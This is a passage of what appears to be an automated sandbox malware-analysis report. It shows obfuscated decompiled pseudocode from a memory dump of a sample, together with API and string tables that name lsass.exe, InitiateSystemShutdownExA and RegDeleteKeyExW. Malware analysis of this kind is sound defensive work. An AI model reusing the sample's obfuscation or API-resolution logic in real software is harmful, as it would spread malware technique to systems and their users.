                      				_push( *0x5090b6);
                      				 *0x509102 =  *0x509102 - _t186;
                      				_t246 = 0;
                      				if(0 <= 0) {
                      					_t246 = 0x7783;
                      				}
                      				 *0x50923a = _t290;
                      				_t291 = _t290 - 0xb1e6a5;
                      				_push( *0x509020);
                      				 *0x5091ee =  *0x5091ee - 0x970e;
                      				if((_t121 & 0x000000bb) >= 0) {
                      					_t291 = _t291 >> _t246;
                      				}
                      				 *0x50be87 =  *0x50be87 + _t286;
                      				 *0x50bf0a =  *0x50bf0a + _t121;
                      				 *(_t294 - 8) = _t121;
                      				if(_t121 >> _t246 < 0x23eb) {
                      				}
                      				_t196 =  *(_t294 - 0x20);
                      				 *0x509172 =  *0x509172 + _t246 - 0x64;
                      				_t125 =  *(_t294 - 8);
                      				_push( *0x5090a4);
                      				if(0 == 0) {
                      					 *0x509162 =  *0x509162;
                      				}
                      				 *0x509194 = 0;
                      				 *(_t294 - 8) = _t125;
                      				 *(_t294 - 0x14) = _t196;
                      				_t131 =  *(_t294 - 8);
                      				_push( *0x509062);
                      				 *((intOrPtr*)(_t294 - 0x24)) =  *((intOrPtr*)(_t294 - 0x24));
                      				if(0 < 0) {
                      					 *0x5091ee = 0x9463;
                      				}
                      				 *(_t294 - 8) = _t131;
                      				 *(_t294 - 0x10) = 0xba;
                      				_push( *0x509220);
                      				 *0x50bf0a =  *0x50bf0a;
                      				_push( *0x5090ec);
                      				 *(_t294 - 0x10) = "normaliz.dll";
                      				_push( *0x50902c);
                      				_t144 =  *(_t294 - 8);
                      				 *(_t294 - 0x20) = 0x765e;
                      				_t255 = 0x65e37c;
                      				 *(_t294 - 8) = _t144;
                      				_push(_t144);
                      				_push(0);
                      				_push(1);
                      				E004673BF(0x419bef);
                      				if(0x202062 == 0x2bb4) {
                      					 *0x50bf0c =  *0x50bf0c + 0x437bad;
                      					 *0x509140 = 0x65e37c;
                      					_t255 = 0x826f;
                      				}
                      				 *0x50bf13 = 0x202062;
                      				_t149 =  *(_t294 - 8);
                      				_push( *0x509174);
                      				 *0x50bf07 = _t149;
                      				if(_t149 != 0x1624) {
                      					 *(_t294 - 0x14) = "RtlReleaseRelativeName";
                      					 *0x509146 = _t255 - 0x537ff0;
                      				}
                      				 *(_t294 - 8) = _t149;
                      				_push(1);
                      				_push(0xb7);
                      				_push(E00476C83);
                      				_push(E00469D4E);
                      				return "api-ms-win-core-localization-l1-1-0.dll";
                      			}





























                      APIs
                      • GetProcAddress.KERNEL32(?), ref: 00476852
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: CoLockObjectExternal$G.V$G`}$NtSetDriverEntryOrder$RtlReleaseRelativeName$System.Net.Primitives.dll$System.Xml.XmlDocument.dll$WSManHTTPConfig.exe$api-ms-win-core-localization-l1-1-0.dll$api-ms-win-core-namedpipe-l1-1-0.dll$b $lsass.exe$networkitemfactory.dll$normaliz.dll$ucmhc.dll$wuapi.dll
                      • API String ID: 190572456-835831452
                      • Opcode ID: 46fa778943e8ca1648417a218bc8d1220ce81416b987ba49e55af8be56c0608f
                      • Instruction ID: bf8f473de16efa10a8a4bf759cc6bbcb66c578ae25cef8d824eb112d9579ea78
                      • Opcode Fuzzy Hash: 46fa778943e8ca1648417a218bc8d1220ce81416b987ba49e55af8be56c0608f
                      • Instruction Fuzzy Hash: 45D18B79E007069BDB00EFB8E8D46DDBBB1FB38314F44806A9944E7356E3784A49DB45
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 29%
                      			E00483DEC(void* __eax, char* __ebx, signed short __edx, void* __edi, signed int __esi) {
                      				signed int _t71;
                      				signed int _t74;
                      				signed int _t75;
                      				signed int _t80;
                      				signed int _t87;
                      				signed int _t90;
                      				signed int _t93;
                      				signed int _t98;
                      				signed int _t102;
                      				signed int _t118;
                      				signed int _t138;
                      				signed int _t157;
                      				intOrPtr _t159;
                      				char* _t194;
                      				void* _t200;
                      				intOrPtr _t206;
                      				void* _t215;
                      				void* _t217;
                      				signed int _t218;
                      				signed int _t219;
                      				void* _t221;
                      
                      				_t218 = __esi;
                      				_t215 = __edi;
                      				_t207 = __edx;
                      				_t143 = __ebx;
                      				_t71 =  *(_t221 - 8);
                      				_push( *0x5093d4);
                      				_t197 = 0xffffffffffff8acd;
                      				 *(_t221 - 8) = _t71;
                      				if(_t71 > 0x17a2) {
                      					_t71 = 0;
                      					_t194 = "WSManHTTPConfig.exe";
                      					 *0x5090e4 =  *0x5090e4 - _t194;
                      					_t143 =  &(_t194[_t194]);
                      					_t197 = 0xffffffffffff2c36;
                      				}
                      				E00469D4E(_t71, _t143, _t197, _t215, 0, 0);
                      				 *0x50917e = _t197;
                      				_t74 = GetProcAddress(??, ??);
                      				 *(_t221 - 8) = _t74;
                      				_t75 =  !_t74;
                      				if(_t75 >= 0x253665) {
                      					if(_t75 < 0x3160) {
                      						_t206 =  *0x50913a; // 0x0
                      						_t197 = _t206 - 0x6891;
                      					}
                      					_t197 =  !_t197;
                      					_t207 = _t207 + _t207 - 0x92;
                      				}
                      				 *0x50bf11 =  *0x50bf11 + _t207;
                      				 *0x509222 = _t218;
                      				_t217 = _t215 + _t215 + 0xf67c;
                      				 *0x5094f0 = 0xca;
                      				_t80 =  *(_t221 - 8);
                      				 *0x50a5e8 = _t80;
                      				_t219 = _t218 ^ 0x0000b980;
                      				 *(_t221 - 8) = _t80;
                      				if(_t80 != 0x14f8) {
                      					 *((intOrPtr*)(_t221 - 0x18)) = 0xd5;
                      					if(0xd5 != 0xd5) {
                      						_t197 = 0x50bf0c;
                      						 *0x50915e = 0x50bf0c;
                      						 *0x509178 = 0x50bf0c;
                      						_t207 = _t219;
                      						if((_t219 & 0x0000b2a9) <= 0) {
                      							_t219 = _t219 | 0x0000c26e;
                      						}
                      						_t219 = _t219 - _t217;
                      						goto L11;
                      					}
                      				}
                      				_t87 =  *(_t221 - 8);
                      				_push(0);
                      				 *(_t221 - 8) = _t87;
                      				if(_t87 - 0x181b <= 0x23c35e) {
                      					 *((intOrPtr*)(_t221 - 0x10)) = 0x453eeb;
                      					if(0 == 0) {
                      						_t197 = _t197 | 0x0055432d;
                      					}
                      					if(_t197 >= _t197) {
                      						_t207 =  *0x509202; // 0x2a00
                      					}
                      					_t207 = _t207 - 0xa9;
                      					_t219 =  !_t219;
                      					 *0x50b576 =  *0x50b576 + _t219;
                      				}
                      				_t90 =  *(_t221 - 8);
                      				_push( *0x509220);
                      				 *0x50b9e7 =  *0x50b9e7 + _t219;
                      				 *0x50bf07 =  *0x50bf07 - _t90;
                      				 *0x509022 =  *0x509022 - _t90;
                      				 *(_t221 - 8) = _t90;
                      				_t157 = "networkitemfactory.dll";
                      				 *0x50910a =  *0x50910a + _t157;
                      				_t200 = 0x71f8;
                      				_t93 =  *(_t221 - 8);
                      				if((_t207 & 0x000081bd) != 0) {
                      					_t207 = 0xa929;
                      					 *0x509240 =  *0x509240 + _t219;
                      					_t219 = 0;
                      					_t157 = _t93 - 0xd4;
                      					 *0x509604 =  *0x509604 - _t217;
                      					 *0x50bb4f =  *0x50bb4f + _t217;
                      				}
                      				 *(_t221 - 8) = _t93;
                      				 *0x5096c4 = _t93;
                      				_push( *0x509058);
                      				_t98 =  *(_t221 - 8);
                      				_t159 =  !_t157 + _t98;
                      				if(_t159 != 0x296299) {
                      					 *((intOrPtr*)(_t221 - 0x18)) =  *((intOrPtr*)(_t221 - 0x18)) + _t159;
                      				}
                      				 *((intOrPtr*)(_t221 - 0x18)) = _t159;
                      				 *(_t221 - 8) = _t98;
                      				_t102 =  *(_t221 - 8);
                      				_push( *0x5090ec);
                      				if(0x469b81 >= 0x469b81) {
                      					_t200 = _t200 - 0x62;
                      				}
                      				if(_t200 >= _t200) {
                      					_t200 = 0x801f;
                      					_t207 = 0x175b75a;
                      				}
                      				 *(_t221 - 8) = _t102;
                      				_push( *0x509006);
                      				 *0x50bf0e =  *0x50bf0e + _t200;
                      				_push( *0x5091e2);
                      				 *((intOrPtr*)(_t221 - 0x1c)) = 0x3ff5f6;
                      				_push( *0x5090ba);
                      				_t118 =  *(_t221 - 8);
                      				 *((intOrPtr*)(_t221 - 0x18)) = _t200 + 0x32cb;
                      				 *(_t221 - 8) = _t118;
                      				 *((intOrPtr*)(_t221 - 0x10)) = _t118 - 0x12357f;
                      				_push( *0x509096);
                      				 *0x5090de =  *0x5090de -  *((intOrPtr*)(_t221 - 0x14));
                      				 *0x509146 = 0;
                      				_push( *0x50902c);
                      				L00468D9F(0x3a404a, _t207, _t217, _t219 + 0xaf6d, 0,  *(_t221 - 8));
                      				_push( *0x509204);
                      				 *((intOrPtr*)(_t221 - 0x14)) =  *((intOrPtr*)(_t221 - 0x14)) - 0x4c5736;
                      				_t138 =  *(_t221 - 8);
                      				 *0x509146 = 0x639f;
                      				_push( *0x5090ec);
                      				 *(_t221 - 8) = _t138;
                      				 *0x509098 =  *0x509098 + 0x4c244b;
                      				_push(0x4c244b);
                      				_push(E0048421D);
                      				_push(L00468BBD);
                      				return _t138 + _t138 - 0x1fcb;
                      			}

























                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: @mQ$CNBP_335.DLL$J@:$MapUserPhysicalPages$Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.Resources.dll$OSProvider.dll$RtlReleaseRelativeName$WFServicesReg.exe$WSManHTTPConfig.exe$api-ms-win-core-localization-l1-1-0.dll$api-ms-win-core-namedpipe-l1-1-0.dll$lsass.exe$networkitemfactory.dll$normaliz.dll$9"
                      • API String ID: 190572456-3183978827
                      • Opcode ID: ab5ae9a4599eb4bb03522be18b089c8c73b5bf135b9659addc67a5007be6c9f2
                      • Instruction ID: fdbb5190ed85a4fc8481351240afbc5eb9d60cb686a4e74718c2ef69e28c392f
                      • Opcode Fuzzy Hash: ab5ae9a4599eb4bb03522be18b089c8c73b5bf135b9659addc67a5007be6c9f2
                      • Instruction Fuzzy Hash: F9B19079E0030A9BDB00EFB8E8D46DDBBB0FB29314F04446ADA44D7356E3385A89DB45
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),-008A8C5C,00000001,?,?,?), ref: 004A9FE8
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: InformationToken
                      • String ID: CoLockObjectExternal$G.V$Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.Resources.dll$NtSetDriverEntryOrder$OSProvider.dll$TpCaptureCaller$WinFax.dll$activeds.dll$api-ms-win-core-localization-l1-1-0.dll$dpnet.dll$mscpxl32.dLL$ucmhc.dll$`}
                      • API String ID: 4114910276-4292496502
                      • Opcode ID: b6c3d83a754756f610e3dee72b481b8f5311bc70a7a42ddb289e0c7c1a0aca38
                      • Instruction ID: bc710896631b538037edb259ebb6e5889ae4351c7705093c30400e6f0467f617
                      • Opcode Fuzzy Hash: b6c3d83a754756f610e3dee72b481b8f5311bc70a7a42ddb289e0c7c1a0aca38
                      • Instruction Fuzzy Hash: 3EF1C075F142469FDB00DFB9EC942CE7BB1FB3A310B08846AD95597366E3390948EB05
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 55%
                      			E004790F7(void* __ecx, signed int __edi, void* __esi, void* __eflags) {
                      				signed int _t112;
                      				unsigned short _t115;
                      				signed char _t116;
                      				signed int _t128;
                      				signed int _t136;
                      				signed int _t139;
                      				signed int _t141;
                      				signed int _t144;
                      				signed int _t160;
                      				signed int _t173;
                      				signed int _t177;
                      				signed int _t183;
                      				unsigned short _t193;
                      				signed int _t200;
                      				signed int _t211;
                      				signed int _t225;
                      				signed int _t234;
                      				signed int _t245;
                      				signed char _t271;
                      				signed char _t272;
                      				short _t277;
                      				short _t284;
                      				signed char _t286;
                      				intOrPtr _t287;
                      				short _t288;
                      				signed short _t299;
                      				signed char _t304;
                      				unsigned short _t310;
                      				signed int _t312;
                      				void* _t313;
                      				void* _t316;
                      				void* _t320;
                      				void* _t321;
                      
                      				_t313 = __esi;
                      				_t309 = __edi;
                      				_t271 = __ecx + 0x566e75;
                      				 *((intOrPtr*)(_t321 - 0x28)) =  *((intOrPtr*)(_t321 - 0x28)) - _t271;
                      				 *((intOrPtr*)(_t321 - 0x2c)) =  *((intOrPtr*)(_t321 - 0x2c)) - _t271;
                      				_t299 = 0x8fae >> _t271;
                      				_t112 = E005002EA(0, _t271, _t299, __edi, __eflags);
                      				 *0x50b5ce =  *0x50b5ce - __esi;
                      				_t183 = _t112 - 0xdb;
                      				if(__edi < 0) {
                      					 *0x50bf17 = _t112;
                      					_t312 = __edi + __edi;
                      					if(_t112 <= 0xb) {
                      						 *0x509056 =  *0x509056 + _t112;
                      						 *(_t321 - 0xc) = _t112;
                      						_t183 =  *(_t321 - 0x14);
                      					}
                      					 *(_t321 - 0x1c) =  *(_t321 - 0x1c) - _t183;
                      					 *0x50bf0c =  *0x50bf0c + _t183;
                      					_t299 = 0xa189;
                      					 *0x50bf12 = _t112;
                      					_t313 = _t313 - 0xad294e;
                      					if(_t313 != 0) {
                      						 *0x50bf15 = _t112;
                      					}
                      					_t309 = _t312 ^ 0x0000f061;
                      					_t183 = "InitiateSystemShutdownExA";
                      				}
                      				 *(_t321 - 0x58) = _t112;
                      				 *(_t321 - 0x10) = _t183 - _t112 - 0x20ac01 + 0x2ed086;
                      				 *(_t321 - 8) = _t112;
                      				_push(_t112);
                      				L00468BBD(_t112, _t299);
                      				_t115 =  *(_t321 - 8);
                      				_push( *(_t321 - 0x58));
                      				_t272 =  *0x509168; // 0x118d
                      				if(_t272 == _t272) {
                      					L9:
                      					_t299 = 0xad99;
                      					 *0x50924e =  *0x50924e - _t313;
                      					 *0x50b56a =  *0x50b56a - _t313;
                      					if((_t309 & _t313 + _t313) == 0) {
                      						 *0x50962a =  *0x50962a + _t309;
                      					}
                      					_t309 = _t309 & 0x0000ecac;
                      					goto L12;
                      				} else {
                      					if((_t299 & 0x00000088) <= 0) {
                      						L12:
                      						_t193 = _t115;
                      						_t116 = GetProcAddress( *0x5093f8, ??);
                      						_t315 = 0x50bf12;
                      						if((_t116 & 0x000000bb) < 0) {
                      							L19:
                      							 *0x50bf15 = _t116;
                      							_t310 = _t309 + _t309;
                      							 *0x50aa70 = _t116;
                      							 *0x50bf0c =  *0x50bf0c + _t272;
                      							_push(0);
                      							if(((_t193 >> _t272) - 0x00364f7f | 0x00004c53) >= ((_t193 >> _t272) - 0x00364f7f | 0x00004c53)) {
                      								_t272 = 0x5d23;
                      								 *0x50917a = 0x5d23;
                      								_t299 = _t299 - 0x8c71;
                      							}
                      							 *0x509214 = _t299;
                      							_t316 = _t315 - 1;
                      							_push( *0x50902c);
                      							if((_t299 & 0x00009d42) < 0) {
                      								_t299 = 0xad07;
                      								 *0x50ad84 =  *0x50ad84 + _t316;
                      								_t310 = _t310 >> _t272;
                      							}
                      							 *(_t321 - 8) = _t116;
                      							_t200 = "CoLockObjectExternal";
                      							 *(_t321 - 0x1c) = _t200;
                      							 *(_t321 - 0x14) = _t200;
                      							_push( *0x509050);
                      							E0046624A(0, 0x7116, _t299, _t310, _t316, 0);
                      							 *(_t321 - 0x18) = "ucmhc.dll";
                      							_push( *0x509006);
                      							_t277 = 0x512580;
                      							_t128 =  *(_t321 - 8);
                      							 *(_t321 - 0x10) = _t128;
                      							if(0xe22c < 0xe22c || 0x512580 > 0x512580) {
                      								_t277 = 0x7d26;
                      							}
                      							 *0x5091ca = _t299;
                      							_push( *0x5090d8);
                      							 *(_t321 - 8) = _t128;
                      							_t136 =  *(_t321 - 8);
                      							_t211 = "ucmhc.dll";
                      							 *(_t321 - 0x18) = _t211;
                      							if(_t211 != _t211) {
                      								 *0x509156 = _t277;
                      								_t277 =  *0x5091a2; // 0x8971
                      								 *0x5091f2 = 0x9118;
                      								_t211 =  *0x50bf12; // -34
                      							}
                      							 *0x50bf14 = _t136;
                      							 *(_t321 - 8) = _t136;
                      							 *(_t321 - 0x10) = 0xec;
                      							_t139 =  *(_t321 - 8);
                      							_push( *0x5090d8);
                      							 *0x509178 = _t277 - 0x528217 + 0x6bc3;
                      							_t282 = 0;
                      							 *0x50bf14 = _t139;
                      							_push( *0x50902c);
                      							_t304 =  *0x509212; // 0xc472
                      							 *0x50bf13 = _t139;
                      							_t320 = _t316 + 0xca60 - 0xa13ace + _t316 + 0xca60 - 0xa13ace + 0xd34e;
                      							 *(_t321 - 8) = _t139;
                      							_t141 =  *(_t321 - 8);
                      							_t225 = "CoLockObjectExternal";
                      							 *0x50bf0c =  *0x50bf0c - _t225;
                      							if(0 == 0) {
                      								_t282 = 0x67;
                      								 *((intOrPtr*)(_t321 - 0x28)) =  *((intOrPtr*)(_t321 - 0x28));
                      								 *0x509196 = 0x67;
                      							}
                      							 *(_t321 - 8) = _t141;
                      							_t144 =  *(_t321 - 8);
                      							 *(_t321 - 0x14) = _t225;
                      							 *0x50914e = _t282;
                      							_push( *0x5091bc);
                      							_t284 = _t282 - 0x5d53d5 + 0x77d4;
                      							 *0x50919e = _t284;
                      							if((_t304 & 0x00799cde) != 0) {
                      								_t304 = _t304 + 0x8ed43f;
                      							}
                      							 *(_t321 - 8) = _t144;
                      							 *0x50bf0b =  *0x50bf0b + 0x25b1a3;
                      							_push( *0x50902c);
                      							 *0x50912e = _t284;
                      							_push( *0x5090ec);
                      							_t234 = "NtSetDriverEntryOrder" ^ 0x000055a1;
                      							_t286 =  *0x509130; // 0x5f4e
                      							 *(_t321 - 0x14) = _t234;
                      							 *(_t321 - 0x10) = "lsass.exe";
                      							_t160 =  *(_t321 - 8);
                      							_push( *0x509006);
                      							 *(_t321 - 8) = _t160;
                      							 *(_t321 - 0xc) =  !_t160;
                      							 *(_t321 - 0x14) = _t234 + _t234 + 0x326361 - 0x2e207b >> _t286;
                      							_push( *0x50908c);
                      							 *0x509148 = _t286;
                      							if("normaliz.dll" >= 0x23bb73) {
                      							}
                      							_t287 =  *0x50914e; // 0xef9e
                      							_t288 = _t287 - 1;
                      							 *0x50919a = _t304;
                      							_push( *0x5090d8);
                      							_t173 =  *(_t321 - 8);
                      							_t245 =  *(_t321 - 0x18);
                      							 *(_t321 - 8) = _t173;
                      							if(_t173 <= 0x1b) {
                      								L39:
                      								if(_t173 >= 0) {
                      									 *0x509668 =  *0x509668;
                      								}
                      								goto L42;
                      							} else {
                      								 *(_t321 - 0x18) = 0x2d9d53;
                      								 *(_t321 - 0x1c) = 0x2d9d53;
                      								_t245 = 0;
                      								_t288 = _t288 - 0x580ae0;
                      								 *0x50915a =  *0x50915a - _t288;
                      								 *0x509170 = _t288;
                      								if((_t304 & 0x0000008c) != 0) {
                      									L38:
                      									_t173 = 0xcc;
                      									if(_t320 != 0) {
                      										L42:
                      										 *0x50908e =  *0x50908e + _t245;
                      										L43:
                      										_t177 =  *(_t321 - 8);
                      										_push( *0x5090a4);
                      										 *(_t321 - 8) = _t177;
                      										_push(0);
                      										_push(0x4796ec);
                      										_push(E0046624A);
                      										return _t177 + _t177;
                      									}
                      									goto L39;
                      								}
                      								if((_t304 & 0x0000009c) > 0) {
                      									goto L43;
                      								}
                      								 *0x50aabc =  *0x50aabc + _t304;
                      								goto L38;
                      							}
                      						}
                      						_t315 = 0xa17e24;
                      						 *0x50bf17 = _t116;
                      						_t309 = 0;
                      						 *(_t321 - 0xc) = _t116;
                      						if("networkitemfactory.dll" != "networkitemfactory.dll") {
                      							L17:
                      							L18:
                      							_t193 = 0xcc;
                      							goto L19;
                      						}
                      						_t272 = 0x798a;
                      						if(0x108 != 0) {
                      							goto L18;
                      						}
                      						_t299 = 0;
                      						if(0 >= 0) {
                      							 *0x50bf12 = _t116;
                      						}
                      						goto L17;
                      					}
                      					 *0x50a800 =  *0x50a800 + _t299;
                      					goto L9;
                      				}
                      			}

                      APIs
                      • GetProcAddress.KERNEL32(?,00000000), ref: 00479210
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: U$$CoLockObjectExternal$InitiateSystemShutdownExA$NtSetDriverEntryOrder$RegDeleteKeyExW$RtlReleaseRelativeName$WSManHTTPConfig.exe$api-ms-win-core-localization-l1-1-0.dll$api-ms-win-core-string-l1-1-0.dll$lsass.exe$networkitemfactory.dll$normaliz.dll$ucmhc.dll
                      • API String ID: 190572456-1852036211
                      • Opcode ID: 245b04911c3052a5cf603238619799d581d2301d6668d604d58d09fa1feda66c
                      • Instruction ID: b8c3f4eecacca3919156f4fa47470da3d10556971ec80b4dd46e9507c838d160
                      • Opcode Fuzzy Hash: 245b04911c3052a5cf603238619799d581d2301d6668d604d58d09fa1feda66c
                      • Instruction Fuzzy Hash: 42F19EB9E403069FDB00EFB8E8946CEBBB0FB39320F04856AD944A7356E3350949DB55
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • GetProcAddress.KERNEL32(?), ref: 0048DE52
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: G`}$IMCCPHR.exe$NtSetDriverEntryOrder$System.Net.Primitives.dll$VarI4FromCy$WFServicesReg.exe$WSManHTTPConfig.exe$_isdel.exe$aaclient.dll$lsass.exe$rG'$ucmhc.dll
                      • API String ID: 190572456-3620216841
                      • Opcode ID: 78282b8efde38e25a87dca7309345f4ea98c4ad8c8a757a3c00c1ec1ad5b0fca
                      • Instruction ID: 9ff4fb8c8486b416f283ad20d4e1b1b4b1d69f81cbb3a3c4bf9d1974cc0d837b
                      • Opcode Fuzzy Hash: 78282b8efde38e25a87dca7309345f4ea98c4ad8c8a757a3c00c1ec1ad5b0fca
                      • Instruction Fuzzy Hash: C1A18F79E1030A9BCB00EFB9E8D85DEBBB0FB29324F00446AD945E7356E3745A49DB44
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 25%
                      			E0047A8AD() {
                      				signed int _t64;
                      				signed int _t66;
                      				signed int _t67;
                      				signed int _t78;
                      				_Unknown_base(*)()* _t81;
                      				signed int _t83;
                      				signed int _t88;
                      				char* _t116;
                      				signed int _t119;
                      				void* _t121;
                      				signed int _t145;
                      				signed char _t171;
                      				signed int _t176;
                      				intOrPtr _t179;
                      				void* _t180;
                      				intOrPtr _t181;
                      				short _t182;
                      				short _t186;
                      				intOrPtr _t189;
                      				short _t191;
                      				signed int _t193;
                      				signed int _t194;
                      				signed short _t198;
                      				void* _t199;
                      				unsigned short _t206;
                      				unsigned short _t207;
                      				signed int* _t208;
                      				signed int _t209;
                      				void* _t213;
                      				void* _t215;
                      				void* _t216;
                      				void* _t217;
                      				void* _t221;
                      
                      				 *(_t221 - 8) = _t64;
                      				_t66 =  *(_t221 - 8);
                      				if(0x3a74b5 != 0x3a74b5) {
                      					L4:
                      					_t193 = 0x97e8;
                      					 *0x50bf12 = _t66;
                      					 *(_t221 - 0x58) = _t66;
                      					_t207 = _t206 >> _t171;
                      					 *(_t221 - 0xc) = _t66;
                      					_t67 =  !_t66;
                      					if(0x3a74b5 - _t66 + 0x14 >= 0x337f) {
                      						 *((intOrPtr*)(_t221 - 0x1c)) =  *((intOrPtr*)(_t221 - 0x1c)) + 0x4366b6;
                      						 *0x509126 = _t171;
                      						_t171 = _t171 - 0x7292;
                      						 *0x5091a4 = 0x97e8;
                      						if(0x88 != 0) {
                      							 *0x50bf12 = _t67;
                      							_t67 = 0xd5;
                      							 *0x50961c =  *0x50961c - _t207;
                      						}
                      					}
                      					_t208 = _t207 + 0xf89c;
                      					 *0x50bf09 =  *0x50bf09 - 5;
                      					 *(_t221 - 0x18) =  &(( *(_t221 - 0x18))[0x2f1fce]);
                      					_t174 = 0xc7b2;
                      					if(0xc7b2 >= 0xc7b2) {
                      						_t174 = 0x14b15;
                      						_t193 = _t193 - 1;
                      					}
                      					 *0x509210 = _t193;
                      					 *0x50bf14 = 0xbe;
                      					_push( *(_t221 - 0x58));
                      					 *(_t221 - 8) =  *(_t221 - 0xc);
                      					_t78 =  *(_t221 - 8);
                      					if(0x39f18d <= 0x39f18d) {
                      						L15:
                      						if("Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.Resources.dll" >= 0x39c4) {
                      							 *0x50bf0e =  *0x50bf0e + _t174;
                      							 *0x509154 = _t174;
                      						}
                      						_t176 =  *0x5091a0; // 0x654
                      						_push( *0x5093f8);
                      						_t116 = _t78;
                      						 *(_t221 - 8) = _t78;
                      						if(_t78 <= 0x12539d) {
                      							L22:
                      							goto L23;
                      						} else {
                      							if(_t116 <= 0x278a64) {
                      								 *(_t221 - 0x18) =  *(_t221 - 0x18) - _t116;
                      								 *(_t221 - 0x18) = _t116;
                      								_t176 = _t176 - 0x590a33;
                      							}
                      							 *0x509176 = _t176;
                      							_t176 = 0;
                      							_t193 = _t193 + 0x8ab3 - 0x95;
                      							if((_t193 & 0x000000a5) >= 0) {
                      								L23:
                      								 *0x50912c = _t176;
                      								_t179 = 0x7bfa;
                      								 *0x5091c6 = _t193;
                      								_t194 = _t193;
                      								_t81 = GetProcAddress(??, ??);
                      								 *0x509214 = _t194;
                      								_t119 = 0x4bd58e - _t81;
                      								_t215 = _t213 - 0xfffffffffffff03b;
                      								 *0x50bf14 = _t81;
                      								if(_t208 <= 0) {
                      									L26:
                      									if(_t119 <= _t119) {
                      										 *0x50bf0e =  *0x50bf0e + _t179;
                      									}
                      									_t179 =  *0x50917e; // 0xe31a
                      									_t194 = 0;
                      									L29:
                      									_t198 = _t194 + _t194 + 0xad5f;
                      									 *0x50aaac = _t81;
                      									_t209 = 0x509648;
                      									 *0x5093a0 =  *0x5093a0 + 0x509648;
                      									if(_t81 < 0xff0b7) {
                      										L36:
                      										 *(_t221 - 0xc) = _t81 +  *(_t221 - 0xc);
                      										 *(_t221 - 0x10) = _t119;
                      										_t121 = 0x3b9825;
                      										L37:
                      										 *((intOrPtr*)(_t221 - 0x20)) = _t179;
                      										_t180 = _t179 + _t179;
                      										if(_t180 > _t180) {
                      										}
                      										_t198 =  *0x5091f2; // 0x3c92
                      										L40:
                      										 *0x50bf13 = _t81;
                      										_t216 = _t215 + 0xba96cb;
                      										_push(0);
                      										 *(_t221 - 8) = _t81;
                      										_t83 =  *(_t221 - 8);
                      										 *(_t221 - 0x10) = _t83;
                      										if(_t121 + _t81 > 0x2f095d) {
                      											L45:
                      											 *0x50bf17 = _t83;
                      											_t209 = _t209 + 0x58baf;
                      											 *(_t221 - 0xc) = _t83;
                      											L46:
                      											_t181 =  *0x50912e; // 0x9c03
                      											_push( *0x5090d8);
                      											 *0x50bf0e =  *0x50bf0e - _t181;
                      											if(_t181 != _t181) {
                      												if(_t181 > _t181) {
                      												}
                      												 *0x5091e4 = _t198;
                      												_t198 =  *0x509218; // 0xa1e2
                      											}
                      											 *0x50bf13 = _t83;
                      											_t217 = _t216 + 0xbe5648;
                      											 *0x50bf17 =  *0x50bf17 - _t83;
                      											 *0x50bf17 = _t83;
                      											_push( *0x5090d8);
                      											 *(_t221 - 8) = _t83;
                      											_t182 = 0x600b;
                      											 *0x509152 = 0x600b;
                      											 *0x50916a = 0x600b;
                      											_t199 = _t198 - 0x8a;
                      											_t88 =  *(_t221 - 8);
                      											if( *((intOrPtr*)(_t221 - 0x1c)) <= 0x29e6) {
                      												L56:
                      												 *0x50bf15 = _t88;
                      												_t209 = _t209 + 0xdd6eee;
                      												goto L57;
                      											} else {
                      												if(0x3acafb == 0x3acafb) {
                      													 *((intOrPtr*)(_t221 - 0x20)) = 0x3acafb;
                      												}
                      												_t182 = 0xffffffffffff8f24;
                      												if(0xffffffffffff8f24 < 0xffffffffffff8f24) {
                      													L57:
                      													_push( *0x50902c);
                      													 *((intOrPtr*)(_t221 - 0x20)) = _t182;
                      													 *(_t221 - 8) = _t88;
                      													_t145 =  !("NtPowerInformation" + 0x36) ^ 0x004bbf1d;
                      													_t186 =  *0x50912c; // 0x5d7b
                      													 *0x509192 = _t186;
                      													_push( *0x50901a);
                      													E00466493("dpnet.dll", _t145, _t186, _t209 + 0xdb89, _t217, 0, "dpnet.dll");
                      													_push(1);
                      													_push(_t145 - 0x38);
                      													_push(E0047ADCE);
                      													goto __ebx;
